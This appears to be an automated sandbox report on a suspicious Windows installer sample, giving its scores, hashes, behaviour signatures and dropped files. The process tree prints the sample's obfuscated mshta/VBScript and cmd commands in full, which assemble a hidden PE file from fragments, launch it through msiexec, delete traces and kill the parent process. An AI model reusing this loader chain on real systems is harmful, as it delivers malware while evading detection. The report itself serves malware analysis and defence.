Overview

overview

10

Static

static

10

setup_inst...32.exe

windows7-x64

10

setup_inst...32.exe

windows10-2004-x64

10

setup_inst...2b.exe

windows7-x64

7

setup_inst...2b.exe

windows10-2004-x64

7

setup_inst...61.exe

windows7-x64

1

setup_inst...61.exe

windows10-2004-x64

1

setup_inst...f8.exe

windows7-x64

10

setup_inst...f8.exe

windows10-2004-x64

10

setup_inst...34.exe

windows7-x64

6

setup_inst...34.exe

windows10-2004-x64

6

setup_inst...c2.exe

windows7-x64

3

setup_inst...c2.exe

windows10-2004-x64

7

setup_inst...cb.exe

windows7-x64

10

setup_inst...cb.exe

windows10-2004-x64

10

setup_inst...90.exe

windows7-x64

6

setup_inst...90.exe

windows10-2004-x64

6

setup_inst...79.exe

windows7-x64

10

setup_inst...79.exe

windows10-2004-x64

10

setup_inst...d8.exe

windows7-x64

10

setup_inst...d8.exe

windows10-2004-x64

10

setup_inst...3b.exe

windows7-x64

7

setup_inst...3b.exe

windows10-2004-x64

7

setup_inst...ac.exe

windows7-x64

6

setup_inst...ac.exe

windows10-2004-x64

6

setup_inst...38.exe

windows7-x64

10

setup_inst...38.exe

windows10-2004-x64

10

setup_inst...b5.exe

windows7-x64

3

setup_inst...b5.exe

windows10-2004-x64

3

setup_inst...b2.exe

windows7-x64

6

setup_inst...b2.exe

windows10-2004-x64

7

setup_inst...rl.dll

windows7-x64

3

setup_inst...rl.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    92s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 09:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_installer/Wed094c47c32b.exe

  • Size

    1.3MB

  • MD5

    b5cfd3a9dc9e645e24c79991bca60460

  • SHA1

    0d6bcdca2121d279bbe87c66cab515ac2478f555

  • SHA256

    852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768

  • SHA512

    55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

  • SSDEEP

    24576:4ny/f9u3poiauUTvKptPMfEd4tic/3wFzUm72uuQ2HrvcFM71J7d2SMpBcBuAKlm:BFpxuUTSMNtPgJUmiQ2H9jkSpceGU

Score
7/10
discovery

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4228
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:948
        • C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
          XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3288
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF "" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2728
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF " == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" ) do taskkill -f -im "%~nxL"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3588
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" vbsCriPt: closE ( CrEaTeoBJecT ( "WsCRiPT.ShEll" ). RuN ( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ) )
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5036
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:464
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4832
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2176
              • C:\Windows\SysWOW64\msiexec.exe
                msiexec.exe -y .\PEQQN6S.OU
                7⤵
                • Loads dropped DLL
                • Blocklisted process makes network request
                • System Location Discovery: System Language Discovery
                PID:5112
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill -f -im "Wed094c47c32b.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4460

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\9Odf.6
    Filesize

    1.4MB

    MD5

    b259839b9455f04e8299f22cebe3274f

    SHA1

    30bbbc8d5089648c8c5425c23874976ba2e07b34

    SHA256

    edf7907b29f08e5788b6c611660348cce7cfaacb16bc484471aa06a1b9f8af89

    SHA512

    3de7e0e2d59a9bda837ca9bc5f0da15106ed045aaf28b0ad9ff6afb2a901f23747ace1373d9538692847f51cfbb22fa608e526cacce737c7e70b7482a643bb0d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\OsuKT1.9t
    Filesize

    2B

    MD5

    ac6ad5d9b99757c3a878f2d275ace198

    SHA1

    439baa1b33514fb81632aaf44d16a9378c5664fc

    SHA256

    9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

    SHA512

    bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\PEQQN6S.OU
    Filesize

    1.6MB

    MD5

    a2feb31d070b6920981b5461baa1ef81

    SHA1

    8b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7

    SHA256

    ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950

    SHA512

    b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
    Filesize

    1.3MB

    MD5

    b5cfd3a9dc9e645e24c79991bca60460

    SHA1

    0d6bcdca2121d279bbe87c66cab515ac2478f555

    SHA256

    852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768

    SHA512

    55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\xrB2l6FD.ilF
    Filesize

    210KB

    MD5

    cd4352def1a81b4fe232eeb2c77dbc57

    SHA1

    9fb4f9a790efe3676915699bdc89ba0a06ce8210

    SHA256

    93589b9795d7547015734043f51c8d9a561857452eb91a52609a0be35bc3701c

    SHA512

    1b59d106cc324ad4c6f99358f6d9a6ec9c671ec8573c1f3084bf3d7f3c8f410691c9324b986d51cd89d5b0c48be95298a13a012ecbcfa379af906db25066656e

    Download Submit

  • memory/5112-21-0x0000000002B10000-0x0000000002BAA000-memory.dmp

    Filesize

    616KB

    Download

  • memory/5112-17-0x0000000002A60000-0x0000000002B0F000-memory.dmp

    Filesize

    700KB

    Download

  • memory/5112-18-0x0000000002B10000-0x0000000002BAA000-memory.dmp

    Filesize

    616KB

    Download

  • memory/5112-16-0x00000000022F0000-0x0000000002488000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/5112-22-0x00000000022F0000-0x0000000002488000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/5112-24-0x0000000002B10000-0x0000000002BAA000-memory.dmp

    Filesize

    616KB

    Download

  • memory/5112-26-0x0000000004870000-0x0000000004904000-memory.dmp

    Filesize

    592KB

    Download

  • memory/5112-25-0x0000000002BB0000-0x000000000486D000-memory.dmp

    Filesize

    28.7MB

    Download

  • memory/5112-28-0x0000000004910000-0x000000000499F000-memory.dmp

    Filesize

    572KB

    Download

  • memory/5112-27-0x0000000004910000-0x000000000499F000-memory.dmp

    Filesize

    572KB

    Download

  • memory/5112-30-0x0000000004910000-0x000000000499F000-memory.dmp

    Filesize

    572KB

    Download

  • memory/5112-31-0x0000000000150000-0x0000000000151000-memory.dmp

    Filesize

    4KB

    Download

  • memory/5112-32-0x0000000000160000-0x0000000000164000-memory.dmp

    Filesize

    16KB

    Download